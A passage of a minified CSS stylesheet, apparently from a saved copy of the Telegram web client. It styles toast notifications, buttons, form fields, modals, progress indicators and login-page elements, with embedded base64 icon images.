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)!important}
  1152. #toast-container>.toast-error{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAYAAADgdz34AAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAHOSURBVEhLrZa/SgNBEMZzh0WKCClSCKaIYOED+AAKeQQLG8HWztLCImBrYadgIdY+gIKNYkBFSwu7CAoqCgkkoGBI/E28PdbLZmeDLgzZzcx83/zZ2SSXC1j9fr+I1Hq93g2yxH4iwM1vkoBWAdxCmpzTxfkN2RcyZNaHFIkSo10+8kgxkXIURV5HGxTmFuc75B2RfQkpxHG8aAgaAFa0tAHqYFfQ7Iwe2yhODk8+J4C7yAoRTWI3w/4klGRgR4lO7Rpn9+gvMyWp+uxFh8+H+ARlgN1nJuJuQAYvNkEnwGFck18Er4q3egEc/oO+mhLdKgRyhdNFiacC0rlOCbhNVz4H9FnAYgDBvU3QIioZlJFLJtsoHYRDfiZoUyIxqCtRpVlANq0EU4dApjrtgezPFad5S19Wgjkc0hNVnuF4HjVA6C7QrSIbylB+oZe3aHgBsqlNqKYH48jXyJKMuAbiyVJ8KzaB3eRc0pg9VwQ4niFryI68qiOi3AbjwdsfnAtk0bCjTLJKr6mrD9g8iq/S/B81hguOMlQTnVyG40wAcjnmgsCNESDrjme7wfftP4P7SP4N3CJZdvzoNyGq2c/HWOXJGsvVg+RA/k2MC/wN6I2YA2Pt8GkAAAAASUVORK5CYII=)!important}
  1153. #toast-container>.toast-success{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAYAAADgdz34AAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAADsSURBVEhLY2AYBfQMgf///3P8+/evAIgvA/FsIF+BavYDDWMBGroaSMMBiE8VC7AZDrIFaMFnii3AZTjUgsUUWUDA8OdAH6iQbQEhw4HyGsPEcKBXBIC4ARhex4G4BsjmweU1soIFaGg/WtoFZRIZdEvIMhxkCCjXIVsATV6gFGACs4Rsw0EGgIIH3QJYJgHSARQZDrWAB+jawzgs+Q2UO49D7jnRSRGoEFRILcdmEMWGI0cm0JJ2QpYA1RDvcmzJEWhABhD/pqrL0S0CWuABKgnRki9lLseS7g2AlqwHWQSKH4oKLrILpRGhEQCw2LiRUIa4lwAAAABJRU5ErkJggg==)!important}
  1154. #toast-container>.toast-warning{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAYAAADgdz34AAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAGYSURBVEhL5ZSvTsNQFMbXZGICMYGYmJhAQIJAICYQPAACiSDB8AiICQQJT4CqQEwgJvYASAQCiZiYmJhAIBATCARJy+9rTsldd8sKu1M0+dLb057v6/lbq/2rK0mS/TRNj9cWNAKPYIJII7gIxCcQ51cvqID+GIEX8ASG4B1bK5gIZFeQfoJdEXOfgX4QAQg7kH2A65yQ87lyxb27sggkAzAuFhbbg1K2kgCkB1bVwyIR9m2L7PRPIhDUIXgGtyKw575yz3lTNs6X4JXnjV+LKM/m3MydnTbtOKIjtz6VhCBq4vSm3ncdrD2lk0VgUXSVKjVDJXJzijW1RQdsU7F77He8u68koNZTz8Oz5yGa6J3H3lZ0xYgXBK2QymlWWA+RWnYhskLBv2vmE+hBMCtbA7KX5drWyRT/2JsqZ2IvfB9Y4bWDNMFbJRFmC9E74SoS0CqulwjkC0+5bpcV1CZ8NMej4pjy0U+doDQsGyo1hzVJttIjhQ7GnBtRFN1UarUlH8F3xict+HY07rEzoUGPlWcjRFRr4/gChZgc3ZL2d8oAAAAASUVORK5CYII=)!important}
  1155. #toast-container.toast-bottom-full-width>div,#toast-container.toast-top-full-width>div{width:96%;margin:auto}
  1156. .toast{background-color:#030303}
  1157. .toast-success{background-color:#51a351}
  1158. .toast-error{background-color:#bd362f}
  1159. .toast-info,.toast-wait{background-color:#2f96b4}
  1160. .toast-warning{background-color:#f89406}
  1161. #toast-container>.toast-info{background-color:#404040;border-radius:3px;box-shadow:0 0 2px rgba(0,0,0,.12),0 2px 4px rgba(0,0,0,.24);color:#fff;line-height:20px;padding:16px;font-size:13px;text-align:center}
  1162. @media all and (max-width:240px){#toast-container>div{padding:8px 8px 8px 50px;width:11em}
  1163. #toast-container .toast-close-button{right:-.2em;top:-.2em}}
  1164. @media all and (min-width:241px) and (max-width:480px){#toast-container>div{padding:8px 8px 8px 50px;width:18em}
  1165. #toast-container .toast-close-button{right:-.2em;top:-.2em}}
  1166. @media all and (min-width:481px) and (max-width:768px){#toast-container>div{padding:15px 15px 15px 50px;width:25em}}
  1167. :not(.no-enter)#toast-container>div.ng-enter,:not(.no-leave)#toast-container>div.ng-leave{-webkit-transition:200ms cubic-bezier(.25,.25,.75,.75) all;-moz-transition:200ms cubic-bezier(.25,.25,.75,.75) all;-ms-transition:200ms cubic-bezier(.25,.25,.75,.75) all;-o-transition:200ms cubic-bezier(.25,.25,.75,.75) all;transition:200ms cubic-bezier(.25,.25,.75,.75) all}
  1168. :not(.no-enter)#toast-container>div.ng-enter.ng-enter-active,:not(.no-leave)#toast-container>div.ng-leave{opacity:.8}
  1169. :not(.no-enter)#toast-container>div.ng-enter,:not(.no-leave)#toast-container>div.ng-leave.ng-leave-active{opacity:0}
  1170. html{background:#e7ebf0;overflow:visible}
  1171. body{color:#000;background:0 0;font:12px/18px 'Open Sans',"Lucida Grande","Lucida Sans Unicode",Arial,Helvetica,Verdana,sans-serif;overflow:hidden}
  1172. body.non_osx{font:13px/18px Tahoma,sans-serif,Arial,Helvetica}
  1173. h1,h2,h3,h4,h5{color:#222}
  1174. .non_osx h4{font-size:17px}
  1175. .noselect{-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}
  1176. .hasselect{-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;user-select:text}
  1177. .copyonly{color:transparent;display:inline-block;vertical-align:baseline;width:1px;height:0;background:0 no-repeat none;font-size:0;float:left;text-rendering:auto;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}
  1178. .nocopy::before{content:attr(data-content)}
  1179. pre{margin-bottom:0;overflow:auto;padding:3px;border:1px solid #eee;max-height:none;font-size:inherit}
  1180. a{cursor:pointer}
  1181. a.disabled{cursor:default;pointer-events:none}
  1182. .form-control{border:1px solid #d9dbde;border-radius:2px;-webkit-box-shadow:none;-moz-box-shadow:none;box-shadow:none;-webkit-transition:border-color ease-in-out .15s,box-shadow ease-in-out .15s;transition:border-color ease-in-out .15s,box-shadow ease-in-out .15s}
  1183. .form-control:focus{border-color:#66afe9;outline:0;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,.075),0 0 8px rgba(102,175,233,.6);-moz-box-shadow:inset 0 1px 1px rgba(0,0,0,.075),0 0 8px rgba(102,175,233,.6);box-shadow:inset 0 1px 1px rgba(0,0,0,.075),0 0 8px rgba(102,175,233,.6)}
  1184. .form-control.no_outline:focus{border:1px solid #d9dbde;outline:0;-webkit-box-shadow:none;-moz-box-shadow:none;box-shadow:none}
  1185. .form-control:-ms-input-placeholder,.form-control::-moz-placeholder,.form-control::-webkit-input-placeholder{color:#b3b3b3}
  1186. input[type=number]{-moz-appearance:textfield}
  1187. input[type=number]::-webkit-inner-spin-button,input[type=number]::-webkit-outer-spin-button{-webkit-appearance:none;margin:0}
  1188. .btn{border:0;padding:7px 13px}
  1189. .btn.active,.btn.active:focus,.btn:active,.btn:active:focus,.btn:focus,.btn:hover,.open .btn.dropdown-toggle{-webkit-box-shadow:none;-moz-box-shadow:none;box-shadow:none;outline:0}
  1190. .btn-success{color:#fff;background-color:#6ec26d}
  1191. .btn-success.active,.btn-success:active,.btn-success:focus,.btn-success:hover,.open .btn-success.dropdown-toggle{color:#fff;background-color:#61b75b}
  1192. .btn-success.active,.btn-success:active,.open .btn-success.dropdown-toggle{background:#66b864}
  1193. .btn-danger{color:#fff;background-color:#c05f5a}
  1194. .btn-danger.active,.btn-danger:active,.btn-danger:focus,.btn-danger:hover,.open .btn-danger.dropdown-toggle{color:#fff;background-color:#ab5450}
  1195. .btn-danger.active,.btn-danger:active,.open .btn-danger.dropdown-toggle{background:#a24f4b}
  1196. .btn-primary{color:#fff;background-color:#6490b1;border-radius:3px}
  1197. .btn-primary.active,.btn-primary:active,.btn-primary:focus,.btn-primary:hover,.open .btn-primary.dropdown-toggle{color:#fff;background-color:#4a80a9}
  1198. .btn-primary.active,.btn-primary:active,.open .btn-primary.dropdown-toggle{background:#41769e}
  1199. .btn-primary.disabled,.btn-primary[disabled]{background:#7999b3}
  1200. .btn-link{color:#3a6d99;text-decoration:none!important;border-radius:3px;overflow:hidden}
  1201. .btn-link:hover{background:#f2f6fa}
  1202. .btn-link.btn-link-noarea:hover,.btn-link.dropdown-toggle:hover{background:0 0}
  1203. .btn-link.dropdown-toggle:active{outline:0}
  1204. .btn-md{background:0 0;text-decoration:none!important;border-radius:2px;overflow:hidden;text-transform:uppercase;font-size:13px;padding:6px 10px;font-weight:700}
  1205. .btn-md,.btn-md:focus,.btn-md:hover{color:#72a0c7}
  1206. .btn-md:hover{background:#f2f6fa}
  1207. .btn-md-primary,.btn-md-primary:focus,.btn-md-primary:hover{color:#4680b3}
  1208. .btn-md-danger,.btn-md-danger:focus,.btn-md-danger:hover{color:#c05f5a}
  1209. .btn-md-danger:hover{background:#fbe7e6}
  1210. .md-input-group{height:50px;border-bottom:1px solid #e6e6e6;padding:0;margin:0 0 22px}
  1211. .md-textarea-group{height:66px}
  1212. .md-input-grouped{margin-bottom:12px}
  1213. .md-input-label{font-weight:400;color:#999;cursor:pointer;display:block;font-size:13px;margin:0;padding:0;z-index:1;pointer-events:none;-webkit-font-smoothing:antialiased;transform-origin:left center;-webkit-transform-origin:left center;-webkit-transform:translate3d(0,22px,0);transform:translate3d(0,22px,0)}
  1214. .md-input-label span.ng-enter-prepare{display:none}
  1215. .md-input-animated .md-input-group,.md-input-animated .md-input-label{-webkit-transition:all .15s cubic-bezier(.35,0,.25,1);transition:all .15s cubic-bezier(.35,0,.25,1)}
  1216. .md-input{color:#000;background:#fff;display:inline-block;border:0;outline:0;font-size:13px;padding:3px 0;margin:3px 0 0;width:100%;resize:none;-webkit-box-shadow:none;-moz-box-shadow:none;box-shadow:none}
  1217. .md-input-disabled .md-input{color:#999}
  1218. .md-input-focused{border-bottom:2px solid #6bace1}
  1219. .md-input-error{border-bottom:2px solid #e2726f}
  1220. .md-input-error .md-input-label{color:#d45a58}
  1221. .md-input-has-value .md-input-label{-webkit-transform:scale(.9);transform:scale(.9)}
  1222. .md-input-group-centered,.md-input-group-centered .md-input{text-align:center}
  1223. .md-input-group-centered .md-input-label{transform-origin:center center;-webkit-transform-origin:center center}
  1224. .md_modal_head{color:#fff;background:#5580a3;padding:0 0 28px 26px}
  1225. .md_modal_head_simple{padding-bottom:13px}
  1226. .md_modal_actions_wrap{float:right}
  1227. a.md_modal_action{display:block;float:right;color:#dde8f1;padding:19px 15px 5px;font-weight:700}
  1228. a.md_modal_action:hover{color:#fff}
  1229. a.md_modal_action_close{padding-right:22px}
  1230. a.md_modal_action:active,a.md_modal_action:focus,a.md_modal_action:hover{text-decoration:none}
  1231. .md_modal_title{font-weight:700;padding:18px 0 5px;font-size:13px}
  1232. .navbar_offline .navbar-header,.navbar_offline .navbar-offline>li{float:left}
  1233. .navbar-offline{max-width:400px;margin:0 auto;float:none}
  1234. .navbar-offline-text{color:#b9cfe3;padding:13px 15px;font-size:13px;display:block;line-height:20px}
  1235. .tg_progress{height:12px;margin:0;padding:0;background:rgba(255,255,255,.4);border:5px solid rgba(0,0,0,.5);border-radius:3px}
  1236. .tg_progress .progress-bar{height:5px;line-height:2px;background:rgba(255,255,255,.9);border-radius:0;overflow:hidden}
  1237. .progress-arc-wrap{display:block;border-radius:100%;transform-origin:center center;-webkit-animation:infinite_rotation .8s linear infinite;-moz-animation:infinite_rotation .8s linear infinite;-ms-animation:infinite_rotation .8s linear infinite;animation:infinite_rotation .8s linear infinite}
  1238. .progress-arc .progress-arc-bar{stroke-dashoffset:0;transform-origin:center center;fill:transparent}
  1239. .progress-arc-intermediate .progress-arc .progress-arc-bar{stroke:#68a4d1}
  1240. .composer_progress_icon .progress-arc .progress-arc-bar{stroke:#b3b3b3}
  1241. .progress-arc-percent .progress-arc .progress-arc-bar{stroke:#FFF;stroke:rgba(255,255,255,.95);transition:stroke-dasharray 500ms linear}
  1242. .stop0{stop-opacity:1;stop-color:#68a4d1}
  1243. .composer_progress_icon .stop0{stop-color:#b3b3b3}
  1244. .stop60{stop-opacity:1;stop-color:#68a4d1}
  1245. .composer_progress_icon .stop60{stop-color:#b3b3b3}
  1246. .stop100{stop-opacity:0;stop-color:#68a4d1}
  1247. .composer_progress_icon .stop100{stop-color:#b3b3b3}
  1248. @-webkit-keyframes infinite_rotation{0%{transform:rotate(0)}
  1249. 100%{transform:rotate(360deg)}}
  1250. @-moz-keyframes infinite_rotation{0%{transform:rotate(0)}
  1251. 100%{transform:rotate(360deg)}}
  1252. @-ms-keyframes infinite_rotation{0%{transform:rotate(0)}
  1253. 100%{transform:rotate(360deg)}}
  1254. @keyframes infinite_rotation{0%{transform:rotate(0)}
  1255. 100%{transform:rotate(360deg)}}
  1256. .dropdown-menu{border-radius:2px;padding:0;-webkit-box-shadow:0 1px 3px rgba(0,0,0,.175);-moz-box-shadow:0 1px 3px rgba(0,0,0,.175);box-shadow:0 1px 3px rgba(0,0,0,.175)}
  1257. .dropdown-menu-to-up{top:auto;bottom:100%;margin:0 0 3px}
  1258. .dropdown-menu>li>a{padding:5px 14px;font-size:13px}
  1259. .modal-backdrop{background:rgba(26,26,26,.7);opacity:1!important}
  1260. .modal-backdrop.fade,.modal.fade,.modal.fade .modal-dialog{-webkit-transition:none;-moz-transition:none;-o-transition:none;transition:none}
  1261. .text-invisible{visibility:hidden}
  1262. .modal{overflow-y:auto;padding:10px}
  1263. .modal-dialog{margin:0 auto}
  1264. .modal-content{border:0;border-radius:0;-webkit-box-shadow:0 1px 10px rgba(0,0,0,.15);-moz-box-shadow:0 1px 10px rgba(0,0,0,.15);box-shadow:0 1px 10px rgba(0,0,0,.15)}
  1265. .modal-header{padding:12px 0 4px 3px;border-bottom:2px solid #E1E1E1;margin:0 18px}
  1266. .modal-title{color:#222;font-weight:700;font-size:17px;line-height:1.4}
  1267. .modal-close-link,.modal-head-link{font-size:12px;line-height:1.4;float:right;padding:0 2px;margin:6px 2px 0 0}
  1268. .modal-close-link:hover,.modal-head-link:hover{text-decoration:none}
  1269. .modal-head-link{margin-right:15px}
  1270. .modal-close-button{position:absolute;z-index:1051;top:0;right:0;width:54px;height:54px}
  1271. .modal-close-button i{display:inline-block;width:12px;height:12px;margin:21px;opacity:.8;background-image:/*savepage-url=../img/icons/IconsetW.png*/url();background-repeat:no-repeat;background-position:-15px -320px}
  1272. .is_2x .modal-close-button i{background-image:/*savepage-url=../img/icons/IconsetW_2x.png*/url();background-size:42px 1171px}
  1273. .modal-close-button:hover i{opacity:1}
  1274. .modal-body{padding:14px}
  1275. .modal-footer{padding:0 14px 13px;margin:0;border-top:0}
  1276. .modal_simple_header{font-size:14px;margin:0 0 10px;text-align:center;font-weight:700}
  1277. .modal_simple_form{max-width:276px;margin:0 auto}
  1278. .modal_simple_form h4{font-size:14px;margin-bottom:38px;text-align:left}
  1279. .modal_simple_form .form-group{margin-bottom:13px}
  1280. .modal_simple_form_description{color:#777;line-height:160%;margin:10px 0 0;text-align:justify}
  1281. .md_simple_header{font-size:14px;margin:0 0 10px;font-weight:700}
  1282. .md_simple_modal_body{padding:40px 37px 0}
  1283. .md_simple_modal_body .modal_simple_form{max-width:none;margin:0;padding:0}
  1284. .md_simple_modal_body .modal_simple_form h4{font-size:14px;margin-top:0;margin-bottom:38px;text-align:left;font-weight:700}
  1285. .md_simple_form_description{color:#777;line-height:160%;margin:0 0 10px;text-align:justify}
  1286. .md_simple_modal_footer{text-align:right;padding:10px 27px 15px}
  1287. .md_simple_modal_footer .btn{margin-left:10px}
  1288. .modal_section_header{font-size:12px;line-height:14px;color:#999;background:#f5f5f5;padding:7px 14px;margin:0}
  1289. .modal_section_body{padding:14px}
  1290. .modal_section_body dl,.modal_section_body p{margin:5px 0}
  1291. .modal_section:last-child .modal_section_body{padding-bottom:8px}
  1292. a.tg_checkbox,p.tg_checkbox{color:#000;display:block;line-height:18px;padding:8px 0;margin:9px 0}
  1293. a.tg_checkbox:hover,p.tg_checkbox:hover{text-decoration:none}
  1294. .tg_checkbox span.icon-checkbox-outer{float:right;display:inline-block;background-color:#e6e6e6;width:36px;height:14px;line-height:14px;vertical-align:middle;border-radius:8px;margin:3px 0;-webkit-transition:background-color ease-in-out .1s;transition:background-color ease-in-out .1s}
  1295. .tg_checkbox.tg_checkbox_on span.icon-checkbox-outer{background-color:#bfd9ed}
  1296. .tg_checkbox i.icon-checkbox-inner{display:inline-block;background:#fff;width:20px;height:20px;border-radius:10px;overflow:hidden;float:left;margin-left:-1px;margin-top:-3px;-webkit-transition:all ease .1s;transition:all ease .1s;border:1px solid #E7E7E7;-webkit-box-shadow:0 0 1px rgba(0,0,0,.05);-moz-box-shadow:0 0 1px rgba(0,0,0,.05);box-shadow:0 0 1px rgba(0,0,0,.05)}
  1297. .tg_checkbox.tg_checkbox_on i.icon-checkbox-inner{background:#6b9bc2;margin-left:16px;border:0;-webkit-box-shadow:none;-moz-box-shadow:none;box-shadow:none}
  1298. .tg_checkbox_label{display:inline-block;line-height:18px;vertical-align:middle}
  1299. .tg_radios_wrap{margin:15px 0}
  1300. a.tg_radio{color:#000;display:block;line-height:20px;padding:5px 0 6px}
  1301. a.tg_radio:hover{text-decoration:none}
  1302. .tg_radio .icon-radio-outer{display:inline-block;width:20px;height:20px;line-height:20px;vertical-align:middle;border-radius:10px;border:2px solid #d8d8d8;overflow:hidden;margin:0 8px 0 0;-webkit-transition:border-color ease-in-out .1s;transition:border-color ease-in-out .1s}
  1303. i.icon-radio{display:inline-block;background-color:#fff;width:16px;height:16px;line-height:16px;border-radius:8px;border:3px solid #fff;-webkit-transition:background-color ease-in-out .1s;transition:background-color ease-in-out .1s}
  1304. .tg_radio.tg_radio_on .icon-radio-outer{border-color:#5c8db3}
  1305. .tg_radio.tg_radio_on i.icon-radio{background-color:#6b9bc2}
  1306. a.tg_radio:hover i.icon-radio{background-color:#f2f2f2}
  1307. a.tg_radio_on:hover i.icon-radio{background-color:#5785aa}
  1308. .tg_radio_label{display:inline-block;line-height:20px;vertical-align:middle}
  1309. .tg_range_wrap{line-height:18px}
  1310. .tg_slider_wrap{position:relative;cursor:pointer;line-height:18px;height:18px}
  1311. .tg_slider_track{position:absolute;background:#c4daec;height:4px;margin:7px 0;width:100%;z-index:2}
  1312. .tg_slider_track_fill{background:#83afd2;height:4px}
  1313. .tg_slider_thumb{position:absolute;border:0;background:#6b9bc2;width:18px;height:18px;border-radius:9px;z-index:3}
  1314. .tg_form_group{padding:6px 0}
  1315. .tg_form_group:first-child{padding-top:0}
  1316. .tg_form_group:last-child{padding-bottom:0}
  1317. .img_fullsize_with_progress_wrap{position:relative;margin:0 auto}
  1318. .img_fullsize_progress_overlay{position:absolute;width:100%;height:100%}
  1319. .img_fullsize_progress_wrap{position:relative}
  1320. .img_fullsize_progress{position:absolute;bottom:0;left:0;width:100%;height:25px;margin:0;background:rgba(0,0,0,.5);border:0;border-radius:0;padding:10px}
  1321. .nano-content{outline:0!important}
  1322. .login_head_bg{background:#5682a3;height:226px}
  1323. .login_page{margin:-131px auto 90px;max-width:404px}
  1324. .login_head_wrap{height:75px}
  1325. .login_head_logo_link{display:inline-block;line-height:30px;padding:23px 15px 22px}
  1326. .tg_logo_wrap{line-height:30px!important}
  1327. .icon-tg-logo{width:30px;height:30px;display:inline-block;vertical-align:top;margin-right:18px;background-image:/*savepage-url=../img/icons/General.png*/var(--savepage-url-3);background-repeat:no-repeat;background-position:-5px -10px}
  1328. .is_2x .icon-tg-logo{background-image:/*savepage-url=../img/icons/General_2x.png*/url();background-size:40px 948px}
  1329. .icon-tg-title{width:62px;height:14px;display:inline-block;vertical-align:middle;background-image:/*savepage-url=../img/Telegram.svg*/var(--savepage-url-4);background-repeat:no-repeat;background-position:0 0;margin-top:1px}
  1330. .login_head_submit_progress,.login_head_submit_wrap{float:right}
  1331. .login_head_submit_wrap{font-weight:700}
  1332. .login_head_submit_btn,.login_head_submit_progress{font-size:13px;line-height:20px;padding:27px 15px 28px;display:inline-block;color:#fff}
  1333. .login_head_submit_btn:active,.login_head_submit_btn:focus,.login_head_submit_btn:hover{color:#fff;text-decoration:none}
  1334. .icon-next-submit{width:7px;height:12px;display:inline-block;vertical-align:middle;margin-left:12px;margin-top:-1px;background-image:/*savepage-url=../img/icons/General.png*/var(--savepage-url-3);background-repeat:no-repeat;background-position:-18px -50px}
  1335. .is_2x .icon-next-submit{background-image:/*savepage-url=../img/icons/General_2x.png*/url();background-size:40px 948px}
  1336. .login_footer_wrap{color:#84a2bc;font-size:13px;line-height:16px;margin-top:25px;text-align:center}
  1337. .logo_footer_learn_more_link,.logo_footer_learn_more_link:active,.logo_footer_learn_more_link:focus,.logo_footer_learn_more_link:hover{color:#84a2bc;font-weight:700}
  1338. .login_form_wrap{background:#fff;padding:44px 65px;-webkit-box-shadow:0 1px 1px rgba(97,127,152,.2),1px 0 0 rgba(97,127,152,.1),-1px 0 0 rgba(97,127,152,.1);-moz-box-shadow:0 1px 1px rgba(97,127,152,.2),1px 0 0 rgba(97,127,152,.1),-1px 0 0 rgba(97,127,152,.1);box-shadow:0 1px 1px rgba(97,127,152,.2),1px 0 0 rgba(97,127,152,.1),-1px 0 0 rgba(97,127,152,.1);border-radius:2px;border:0;margin:0;max-width:none}
  1339. .login_phone_country_input_group{cursor:pointer}
  1340. .login_phone_num_input_group{overflow:hidden}
  1341. .login_phone_code_input_group{float:left;width:50px;margin-right:25px}
  1342. .login_footer_about_wrap{background:#fff;margin-top:12px;padding:44px 65px;-webkit-box-shadow:0 1px 0 #dfe5ec;-moz-box-shadow:0 1px 0 #dfe5ec;box-shadow:0 1px 0 #dfe5ec;border-radius:3px;border:1px solid #dfe5ec}
  1343. .login_footer_about_wrap h3{margin:0 0 20px;font-size:15px;font-weight:700;text-align:left}
  1344. .login_footer_about_wrap h3 .login_footer_about_hide{color:#999;font-size:80%;font-weight:400;margin-left:8px}
  1345. .login_footer_about_wrap p{margin:0 0 20px;font-size:13px;line-height:160%}
  1346. .login_footer_about_wrap p:last-child{margin:0}
  1347. .login_form_head{color:#222;margin:0 0 20px;font-size:15px;font-weight:700}
  1348. .login_form_lead{color:#999;margin:15px 0 30px;font-size:13px;line-height:160%}
  1349. .login_form_hint{color:#999;margin:0 0 20px;font-size:13px;line-height:160%}
  1350. .login_form_messaging{color:#999;font-size:13px;margin-top:20px;line-height:160%}
  1351. .login_phone_head{color:#222;font-size:15px;font-weight:700;text-align:center;margin:0}
  1352. .login_edit_phone{margin:5px 0 15px;text-align:center}
  1353. .login_smscode_lead{color:#999;margin:15px 0;line-height:160%;text-align:center}
  1354. .login_smscode_lead:last-child{margin-bottom:30px}
  1355. .login_forgot_button{text-align:center;margin:30px 0 10px}
  1356. .login_reset_button{text-align:center;margin:10px 0 0}
  1357. .im_dialogs_empty_wrap{margin:60px 50px;text-align:center}
  1358. .im_dialogs_import_phonebook{margin-top:10px}
  1359. .im_dialogs_panel{padding:12px;position:relative}
  1360. .im_dialogs_modal_col_wrap .im_dialogs_panel{padding:7px 12px 6px;-webkit-box-shadow:0 1px 1px rgba(0,0,0,.15);-moz-box-shadow:0 1px 1px rgba(0,0,0,.15);box-shadow:0 1px 1px rgba(0,0,0,.15);z-index:1}
  1361. .im_dialogs_search{position:relative}
  1362. .im_dialogs_search_field{font-size:12px;line-height:normal;border:1px solid #F2F2F2;border-radius:2px;padding:6px 26px 6px 30px;margin:0;background-color:#F2F2F2;background-image:/*savepage-url=../img/icons/IconsetW.png*/url();background-repeat:no-repeat;background-position:-6px -205px}
  1363. .is_2x .im_dialogs_search_field{background-image:/*savepage-url=../img/icons/IconsetW_2x.png*/url();background-size:42px 1171px}
  1364. .im_dialogs_modal_col_wrap .im_dialogs_search_field{background-color:#fff;border-color:#fff!important}
  1365. .im_dialogs_search_field:active,.im_dialogs_search_field:focus{background-color:#fff}
  1366. .im_dialogs_search_field::-ms-clear{display:none}
  1367. a.tg_search_clear{position:absolute;right:0;margin-top:-34px;width:34px;height:34px;opacity:.6}
  1368. .contacts_modal_search a.tg_search_clear{right:12px}
  1369. a.tg_search_clear:hover{opacity:1}
  1370. i.icon-search-clear{display:inline-block;color:#999;width:13px;height:13px;margin:10px 0 0 11px;vertical-align:text-top;background-image:/*savepage-url=../img/icons/IconsetW.png*/url();background-repeat:no-repeat;background-position:-15px -192px}
  1371. .is_2x i.icon-search-clear{background-image:/*savepage-url=../img/icons/IconsetW_2x.png*/url();background-size:42px 1171px}
  1372. i.icon-verified{display:inline-block;width:17px;height:17px;vertical-align:text-top;background-image:/*savepage-url=../img/icons/ProfileIcons.png*/url();background-repeat:no-repeat;background-position:-11px -373px}
  1373. .is_2x i.icon-verified{background-image:/*savepage-url=../img/icons/ProfileIcons_2x.png*/url();background-size:40px 420px}
